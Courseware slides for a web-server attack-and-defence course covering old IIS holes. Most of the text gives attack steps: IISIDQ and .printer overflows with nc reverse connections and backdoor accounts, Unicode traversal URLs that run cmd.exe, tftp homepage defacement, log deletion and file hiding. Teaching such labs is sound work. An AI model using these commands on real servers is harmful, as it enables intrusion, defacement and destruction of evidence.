學(xué)習(xí)情境三服務(wù)器入侵技術(shù)的應(yīng)用與防護(hù)任務(wù)一Web服務(wù)器課件_第1頁(yè)
學(xué)習(xí)情境三服務(wù)器入侵技術(shù)的應(yīng)用與防護(hù)任務(wù)一Web服務(wù)器課件_第2頁(yè)
學(xué)習(xí)情境三服務(wù)器入侵技術(shù)的應(yīng)用與防護(hù)任務(wù)一Web服務(wù)器課件_第3頁(yè)
學(xué)習(xí)情境三服務(wù)器入侵技術(shù)的應(yīng)用與防護(hù)任務(wù)一Web服務(wù)器課件_第4頁(yè)
學(xué)習(xí)情境三服務(wù)器入侵技術(shù)的應(yīng)用與防護(hù)任務(wù)一Web服務(wù)器課件_第5頁(yè)
已閱讀5頁(yè),還剩24頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶(hù)提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

學(xué)習(xí)情境三服務(wù)器入侵技術(shù)的應(yīng)用與防護(hù)任務(wù)一Web服務(wù)器的入侵與防護(hù)

課程負(fù)責(zé)人:楊文虎濟(jì)南鐵道職業(yè)技術(shù)學(xué)院信息工程系課程負(fù)責(zé)人:楊文虎濟(jì)南鐵道職業(yè)技術(shù)學(xué)院信息工程系3.1Web服務(wù)器的入侵與防護(hù)教學(xué)的實(shí)施過(guò)程任務(wù)規(guī)劃學(xué)生探究師生析疑完成任務(wù)檢查評(píng)測(cè)綜合創(chuàng)新思考、探討完成任務(wù)需要的相關(guān)資料,搜集資料,制定工作計(jì)劃

明確需要完成的工作任務(wù);教師進(jìn)行點(diǎn)評(píng)、確定最終的實(shí)施方法;對(duì)技術(shù)問(wèn)題進(jìn)行講授和答疑。學(xué)生進(jìn)入網(wǎng)絡(luò)實(shí)訓(xùn)室,根據(jù)工作計(jì)劃完成每個(gè)工作項(xiàng)目,完成每個(gè)項(xiàng)目實(shí)施日志和心得總結(jié)

學(xué)生分攻防角色相互檢查任務(wù)完成情況,分析不足,給出評(píng)價(jià);教師對(duì)學(xué)生的日志和總結(jié)進(jìn)行分析,給出評(píng)價(jià)。探索更多的Web服務(wù)器的應(yīng)用與防護(hù)的方法,搜索相關(guān)技術(shù),并在實(shí)訓(xùn)室中進(jìn)行驗(yàn)證。3.1Web服務(wù)器的入侵與防護(hù)教學(xué)的實(shí)施過(guò)程任務(wù)規(guī)劃學(xué)生探究主要的IIS漏洞有那些?其攻防技巧各有何特點(diǎn)?掌握.ida&.idq漏洞技術(shù)的攻防技巧了解Printer漏洞,掌握Unicode漏洞的入侵方式防護(hù)策略;了解asp映射分塊編碼漏洞、Webdav漏洞的入侵方式防護(hù)策略。問(wèn)題引領(lǐng)3.1Web服務(wù)器的入侵與防護(hù)主要的IIS漏洞有那些?其攻防技巧各有何特點(diǎn)?問(wèn)題引領(lǐng)3.1項(xiàng)目一、.ida&.idq漏洞攻防分析

Web服務(wù)器的入侵分為基于認(rèn)證的入侵和基于漏洞攻擊的入侵,基于認(rèn)證的入侵包括以下常見(jiàn)的手段:IPC$入侵、遠(yuǎn)程管理計(jì)算機(jī)、Telnet入侵、遠(yuǎn)程命令的執(zhí)行及進(jìn)程查殺注冊(cè)表的入侵、暴力破解密碼等?;诼┒垂艚鼛啄瓯容^流行,黑客是信息時(shí)代的完美主義者,他們通過(guò)研究、試驗(yàn)、編寫(xiě)測(cè)試代碼來(lái)發(fā)現(xiàn)遠(yuǎn)程服務(wù)器中的漏洞,通過(guò)利用遠(yuǎn)程服務(wù)器的漏洞,可以繞過(guò)系統(tǒng)的認(rèn)證直接進(jìn)入系統(tǒng)內(nèi)部。常用的漏洞包括:IIS漏洞、操作系統(tǒng)漏洞、SQL服務(wù)器漏洞IIS(InternetInformationServer),即Internet信息服務(wù)器,它在Windows系統(tǒng)中提供Internet服務(wù),例如提供Web服務(wù)、FTP服務(wù)、SMTP服務(wù),IIS服務(wù)器在方便用戶(hù)使用的同時(shí),帶來(lái)了許多安全隱患。IIS漏洞有近千余種,其中能被用來(lái)入侵的漏洞大多數(shù)屬于“溢出”型漏洞。對(duì)于溢出型漏洞,入侵者可以通過(guò)發(fā)送特定指令格式的數(shù)據(jù)使遠(yuǎn)程服務(wù)區(qū)的緩沖區(qū)溢出,從而突破系統(tǒng)的保護(hù),在溢出的空間中執(zhí)行任意指令。主要的IIS漏洞有:.ida&.idq漏洞、Printer漏洞、Unicode漏洞、.asp映射分塊編碼漏洞、Webdav漏洞IIS漏洞信息的搜集主要使用掃描軟件掃描存在漏洞的主機(jī),例如使用X-Scan進(jìn)行IIS漏洞的掃描,使用telnettargetIP80搜集Web服務(wù)器版本信息。

3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目一、.ida&.idq漏洞攻防分析Web服務(wù)器項(xiàng)目一、.ida&.idq漏洞攻防分析

對(duì)于.ida&.idq漏洞,微軟的IndexServer可以加快Web的搜索能力,提供對(duì)管理員腳本和Internet數(shù)據(jù)的查詢(xún),默認(rèn)支持管理腳本.ida和查詢(xún)腳本.idq。管理腳本.ida和查詢(xún)腳本.idq都是使用idq.dll來(lái)進(jìn)行解析的idq.dll存在一個(gè)緩沖溢出,問(wèn)題存在于idq.dll擴(kuò)展程序上,由于沒(méi)有對(duì)用戶(hù)提交的輸入?yún)?shù)進(jìn)行邊界檢查,可以導(dǎo)致遠(yuǎn)程攻擊者利用溢出來(lái)獲得System權(quán)限訪問(wèn)遠(yuǎn)程系統(tǒng)。關(guān)于.ida&.idq漏洞的檢測(cè)主要使用X-Scan、Sfind等檢測(cè)工具,手工檢測(cè):在地址欄中輸入http://targetIP/*.ida或者h(yuǎn)ttp://targetIP/*.idq3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目一、.ida&.idq漏洞攻防分析對(duì)于.ida項(xiàng)目一、.ida&.idq漏洞攻防分析

IDQ入侵工具IISIDQIISIDQ有命令行和圖形界面兩種方式。使用IISIDQ攻擊遠(yuǎn)程服務(wù)器后,有兩種登錄方式:一是攻擊后主動(dòng)連接方式命令iisidq.exe<操作系統(tǒng)類(lèi)型><目標(biāo)IP><Web端口><1><端口監(jiān)聽(tīng)端口>[輸入命令1];二是攻擊后監(jiān)聽(tīng)遠(yuǎn)程服務(wù)器連接命令iisidq.exe<操作系統(tǒng)類(lèi)型><目標(biāo)IP><Web端口><2><溢出連接IP><溢出連接端口>[輸入命令1]如果不寫(xiě)輸入命令,默認(rèn)命令為cmd.exe/c+dir。如果使用,表示不使用默認(rèn)命令而是要用戶(hù)輸入命令。IISIDQ支持的操作系統(tǒng)類(lèi)型如下所示:0IIS5中文Win2000Sp0,1IIS5中文Win2000Sp1,2IIS5中文Win2000Sp2idq3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目一、.ida&.idq漏洞攻防分析IDQ入侵工具IIS項(xiàng)目一、.ida&.idq漏洞攻防分析

漏洞溢出連接工具-NCnc在網(wǎng)絡(luò)工具中有“瑞士軍刀”的美譽(yù),通過(guò)nc,入侵者可以方便的連接遠(yuǎn)程服務(wù)器.nc有兩種方法進(jìn)行連接:主動(dòng)連接到外部:nc[-options]hostnameport[s][ports],監(jiān)聽(tīng)等待外部連接:nc–l–pport[-option][hostname][port]NC使用的參數(shù)說(shuō)明:-e:prog程序重定向,一旦連接,就執(zhí)行-g:網(wǎng)關(guān)路由跳數(shù),可設(shè)置到8-h:幫助信息-i:secs延時(shí)的間隔-l:監(jiān)聽(tīng)模式,用于入站連接-n:指定數(shù)字的IP地址,不能用hostname-o:file記錄16進(jìn)制的傳輸-p:port本地端口號(hào)-r:任意指定本地及遠(yuǎn)程端口-s:addr本地源地址-u:UDP模式-v:詳細(xì)輸出(用兩個(gè)-v可得到更詳細(xì)的內(nèi)容)-w:secs超時(shí)時(shí)間-z:將輸入輸出關(guān)掉——用于掃描時(shí)3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目一、.ida&.idq漏洞攻防分析漏洞溢出連接工具-N項(xiàng)目一、.ida&.idq漏洞攻防分析

下面我們來(lái)看幾個(gè)入侵實(shí)例.idq入侵實(shí)例1步驟一:掃描遠(yuǎn)程服務(wù)器步驟二:IDQ溢出。使用連接方式一進(jìn)行idq漏洞溢出。使用的命令為iisidq0068015213.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目一、.ida&.idq漏洞攻防分析下面我們來(lái)看項(xiàng)目一、.ida&.idq漏洞攻防分析

步驟三:使用nc進(jìn)行連接。使用命令nc–v06521。3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目一、.ida&.idq漏洞攻防分析步驟三:使用nc進(jìn)行項(xiàng)目一、.ida&.idq漏洞攻防分析

步驟四:建立后門(mén)帳號(hào)步驟五:使用exit命令斷開(kāi)連接,比較命令如圖所示3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目一、.ida&.idq漏洞攻防分析步驟四:建立后門(mén)帳號(hào)項(xiàng)目一、.ida&.idq漏洞攻防分析

.idq入侵實(shí)例2步驟一:掃描遠(yuǎn)程服務(wù)器步驟二:使用nc在本地打開(kāi)端口等待連接。使用命令nc-l–p250。參數(shù)-l表示使用監(jiān)聽(tīng)模式,-p表示設(shè)置本地監(jiān)聽(tīng)端口2503.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目一、.ida&.idq漏洞攻防分析.idq入侵實(shí)例23項(xiàng)目一、.ida&.idq漏洞攻防分析

步驟三:IDQ溢出。使用命令iisidq006802002501采用方式二進(jìn)行溢出,使遠(yuǎn)程服務(wù)器溢出后自動(dòng)連接到本地計(jì)算機(jī)的250端口3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目一、.ida&.idq漏洞攻防分析步驟三:IDQ溢出項(xiàng)目一、.ida&.idq漏洞攻防分析

步驟四:進(jìn)行溢出后的攻擊步驟五:建立后門(mén)帳號(hào)步驟六:使用exit命令斷開(kāi)連接3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目一、.ida&.idq漏洞攻防分析步驟四:進(jìn)行項(xiàng)目一、.ida&.idq漏洞攻防分析

IISIDQ的圖形界面3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目一、.ida&.idq漏洞攻防分析IISIDQ3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、Unicode漏洞攻防分析技術(shù)支持假冒的缺點(diǎn)之一是這個(gè)假冒是在太常見(jiàn)了。公司已經(jīng)意識(shí)到這種假冒技巧并要求防范。另一種技巧是第三方假冒,它能夠更成功的獲取內(nèi)部信息。

.printer漏洞windows2000IIS5存在打印擴(kuò)展ISAPI(InternetServiceApplicationProgrammingInterface),使得.printer擴(kuò)展與msw3prt.dll進(jìn)行映射,該擴(kuò)展可以通過(guò)Web調(diào)用打印機(jī)。在msw3prt.dll中存在緩沖區(qū)溢出漏洞,微軟建議,一般在未打補(bǔ)丁之前,一定要移除ISAPI網(wǎng)絡(luò)打印的映射。步驟一:使用nc監(jiān)聽(tīng)端口步驟二:使用IIS5Exploit進(jìn)行漏洞溢出,命令格式IIS5Exploit<目標(biāo)IP><入侵者IP><本地監(jiān)聽(tīng)端口>3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、Unicode漏洞攻防分析3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、Unicode漏洞攻防分析Unicode目錄遍歷漏洞微軟IIS4.0和5.0都存在利用擴(kuò)展Unicode字符取代“/”和“\”,從而可以利用“../”目錄遍歷的漏洞,該漏洞帳號(hào)默認(rèn)情況下屬于Everyone和Users組的成員,因此任何與Web根目錄在同一邏輯分區(qū)上的能被這些組訪問(wèn)的文件都能被刪除,修改或執(zhí)行。入侵者不能像使用.ida和.idq漏洞那樣,直接溢出一個(gè)擁有管理員權(quán)限的shell,而只是具有IUSR_machinename權(quán)限,也就是說(shuō),只能進(jìn)行簡(jiǎn)單的文件操作。使用Unicode構(gòu)造“/”和“\”字符舉例%c1%1c—>(0xc1-0xc0)*0x40+0x1c=0x5c=‘/’%c0%2f—>(0xc0-0xc0)*0x40+0x2f=0x2f=‘\’3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、Unicode漏洞攻防分析3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、Unicode漏洞攻防分析手工檢測(cè)漏洞我們要使用遠(yuǎn)程系統(tǒng)Windows2000server中文版,在地址欄輸入:06/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\”3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、Unicode漏洞攻防分析命令說(shuō)明:命令中的“+”,代表空格,06遠(yuǎn)程服務(wù)器IP地址,scripts為遠(yuǎn)程服務(wù)器上的腳本文件目錄,“..%c1%1c..”被遠(yuǎn)程服務(wù)器譯為“../”,winnt/system32/cmd.exe?/c+打開(kāi)遠(yuǎn)程服務(wù)器的cmd.exe,一般不用改變,dir+c:\入侵者要執(zhí)行的命令,利用此命令,入侵者將IE編程了遠(yuǎn)程命令的控制臺(tái)。

Unicode入侵實(shí)例—:涂鴉主頁(yè)步驟一:準(zhǔn)備標(biāo)語(yǔ)主頁(yè),并保存成index.htm步驟二:探知遠(yuǎn)程服務(wù)器的Web根目錄方法一:利用.ida或者.idq漏洞。方法二:輸入06/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\mmc.gif/s其中,/s表示在dir命令后查找指定文件或文件夾的物理路徑,mmc.gif是默認(rèn)安裝在Web根目錄中的,找到該文件的同時(shí),也就找到了Web根目錄。3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、Unicode漏洞攻防分析3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、Unicode漏洞攻防分析步驟三:涂鴉主頁(yè)。在地址欄中使用Unicode漏洞查詢(xún)Web服務(wù)器主頁(yè),假設(shè)是index.htm。使用tftp將自己做好的主頁(yè)替換掉原Web服務(wù)器的主頁(yè)。tftp的使用tftp只要執(zhí)行tftpd32.exe,本計(jì)算機(jī)就成為一臺(tái)tftp服務(wù)器,使用windows自帶的tftp命令便可以在該服務(wù)器上傳和下載文件。使用方法:tftp[-i]host[GET/PUT]source[destination]-I 二進(jìn)制文件傳輸host tftp服務(wù)器地址Get 下載文件PUT 上傳文件Source 文件名Destination 目的地3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、Unicode漏洞攻防分析3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、Unicode漏洞攻防分析Unicode漏洞的實(shí)例二:擦腳印通過(guò)Unicode漏洞進(jìn)入遠(yuǎn)程服務(wù)器后,肯定會(huì)在該服務(wù)器上留下自己的ip,為了隱藏自己,通常需要清除服務(wù)器的日志,這種做法叫作擦腳印。Del+c:\winnt\system32\logfiles\*.*Del+c:\winnt\system32\confige\*.evtDel+c:\winnt\system32\dtclog\*.*Del+c:\winnt\system32\*.logDel+c:\winnt\system32\*.txtDel+c:\winnt\*.txtDel+c:\winnt\*.logUnicode獲得的權(quán)限較低,一般無(wú)法執(zhí)行bat文件3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、Unicode漏洞攻防分析Unicode漏洞實(shí)例三:修改文件屬性入侵過(guò)程中,入侵者通常希望隱藏自己的文件。如果上傳的文件設(shè)置成“隱藏”加“系統(tǒng)”屬性,就可以避免被發(fā)現(xiàn)。Attrib命令的使用:Attrib[+R|-R][+A|-A][+S|-S][+H|-H][[drive:][path]filename][/S/D]+:設(shè)置屬性-:清除屬性R:只讀文件屬性A:存檔文件屬性S:系統(tǒng)文件屬性H:隱藏文件屬性/S:處理當(dāng)前文件夾及其子文件夾中的匹配文件/D:處理文件夾。如果要把c盤(pán)中的abc.exe設(shè)置成“系統(tǒng)”加“隱藏”屬性,使用命令“attrib.exe+%2bH+%2bS+c:\abc.exe”其中,“%2b”表示“+”號(hào),類(lèi)似,要取消掉隱藏和系統(tǒng)屬性,使用命令“attrib.exe+-H+-S+c:\abc.exe”。3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目二、Printer漏洞、U3.1Web服務(wù)器的入侵與防護(hù)項(xiàng)目三、.asp映射分塊編碼漏洞、Webdav攻防分析

.ASP映射分塊編碼漏洞Windows2000和NT4IIS.asp映射存在遠(yuǎn)程緩沖溢出漏洞。ASPISAPI過(guò)濾器默認(rèn)在所有NT4和WIN2000系統(tǒng)中裝載,存在的漏洞可以導(dǎo)致遠(yuǎn)程執(zhí)行任意命令。惡意攻擊者可以使用分塊編碼形式數(shù)據(jù)給IIS服務(wù)器,當(dāng)解碼和解析這些數(shù)據(jù)的時(shí)候可以強(qiáng)迫IIS把入侵者提供的數(shù)據(jù)寫(xiě)到內(nèi)存任意位置。通過(guò)此漏洞可以導(dǎo)致WIN2000系統(tǒng)產(chǎn)生緩沖溢出并以IWAM_computer_name用戶(hù)的權(quán)限執(zhí)行任意代碼,而在WINDOWS

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶(hù)所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶(hù)上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶(hù)上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶(hù)因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論